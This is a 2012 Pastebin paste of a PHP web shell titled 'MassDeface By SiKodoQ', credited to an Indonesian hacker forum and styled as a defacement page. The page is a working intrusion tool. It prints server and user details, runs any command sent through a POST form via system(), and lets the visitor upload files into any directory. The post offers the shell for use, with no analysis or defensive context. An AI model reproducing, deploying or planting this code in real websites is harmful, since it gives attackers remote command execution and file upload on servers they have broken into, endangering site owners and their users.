API tools faq
paste
Advertisement
flazer

shell masdeface by SiKodoQ

flazer
Feb 29th, 2012
223
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.80 KB | None | 0 0
raw download clone embed print report
  1. <title>MassDeface By SiKodoQ</title>
  2. <BODY text=#00ff00 bgColor=#000000
  3. background="http://deface.persiangig.com/deface/1.gif">
  4. <center>
  5. <IMG
  6. src="http://a3.sphotos.ak.fbcdn.net/hphotos-ak-ash4/424946_239268132819665_100002094408095_550374_85613837_n.jpg" width="100" height="75"><br>
  7. <font face="Comic Sans MS" size="2"><b>Everybody know their limits, you just got more than others.<br>
  8. Search in everymind, looking for knowledge. Hacking is an art.</b></font> <br><br>
  9. <!-- <img src="http://img238.echo.cx/img238/6607/9027jn.gif"> -->
  10. <br>
  11.  
  12. </center>
  13. <br><br><br>
  14. <p><font face="Verdana" size="1">
  15. <b>#</b> SiKodoQ PHP Injection<br>
  16. <b>#</b> Forum Hacker Indonesia<br>
  17. <b>#</b> Released by : <b>SiKodoQ</b></font>
  18.  
  19. </font>
  20. </p>
  21. <hr><hr>
  22. <p> <font face="comic sans MS" style="font-size: 9pt"><b>
  23. <br>
  24.  
  25. </b>
  26.  
  27. </font><font face="comic sans MS">
  28. </p>
  29. <div align="left"><b><?php
  30. closelog( );
  31. $user = get_current_user( );
  32. $login = posix_getuid( );
  33. $euid = posix_geteuid( );
  34. $ver = phpversion( );
  35. $gid = posix_getgid( );
  36. if ($chdir == "") $chdir = getcwd( );
  37. if(!$whoami)$whoami=exec("whoami");
  38. ?>
  39. <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
  40. <?php
  41. $uname = posix_uname( );
  42. while (list($info, $value) = each ($uname)) {
  43. ?>
  44. <TR>
  45. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b><span style="font-size: 9pt"><?= $info ?>
  46. <span style="font-size: 9pt">:</b> <?= $value ?></span></DIV></TD>
  47. </TR>
  48. <?php
  49. }
  50. ?>
  51. <TR>
  52. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  53. <span style="font-size: 9pt">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?=
  54.  
  55. $gid ?>(<?= $whoami?>)</span></DIV></TD>
  56. </TR>
  57. <TR>
  58. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  59. <span style="font-size: 9pt">Current Path:</b> <?= $chdir ?></span></DIV></TD>
  60. </TR>
  61. <TR>
  62. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  63. <span style="font-size: 9pt">Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
  64. </span></DIV></TD>
  65. </TR>
  66. <TR>
  67. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  68. <span style="font-size: 9pt">Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
  69. </span></DIV></TD>
  70. </TR>
  71. <TR>
  72. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  73. <span style="font-size: 9pt">Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
  74. </span></DIV></TD>
  75. </TR>
  76. <TR>
  77. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  78. <span style="font-size: 9pt">Script Current User:</b> <?= $user ?></span></DIV></TD>
  79. </TR>
  80. <TR>
  81. <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
  82. <span style="font-size: 9pt">PHP Version:</b> <?= $ver ?></span></DIV></TD>
  83. </TR>
  84. </TABLE>
  85. </b>
  86. </div></font></div>
  87.  
  88. <?php
  89.  
  90. set_magic_quotes_runtime(0);
  91.  
  92. $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
  93. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  94.  
  95. $UName = `uname -a`;
  96. $SCWD = `pwd`;
  97. $UserID = `id`;
  98.  
  99. if( $currentWD == "" ) {
  100. $currentWD = $SCWD;
  101. }
  102.  
  103. if( $_POST['_act'] == "List files!" ) {
  104. $currentCMD = "ls -la";
  105. }
  106.  
  107.  
  108. print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";
  109.  
  110. print "<tr><td><b>Command:</b></td><td><TEXTAREA ROWS=8 COLS=75 name=\"_cmd\" value=\"".$currentCMD."\"></TEXTAREA></td>";
  111. print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  112.  
  113. print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  114. print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  115.  
  116. print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
  117. print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  118.  
  119. print "</table></form><hr><hr>";
  120.  
  121. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  122. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  123.  
  124. if( $_POST['_act'] == "Upload!" ) {
  125. if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  126. print "<center><b>Error while uploading file!</b></center>";
  127. } else {
  128. print "<center><pre>";
  129. system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  130. print "</pre><b>File uploaded successfully!</b></center>";
  131. }
  132. } else {
  133. print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
  134. $currentCMD = "cd ".$currentWD.";".$currentCMD;
  135. system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
  136. /tmp/cmdtemp");
  137. print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
  138. }
  139.  
  140. exit;
  141.  
  142. ?></body></font></font></b></font>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!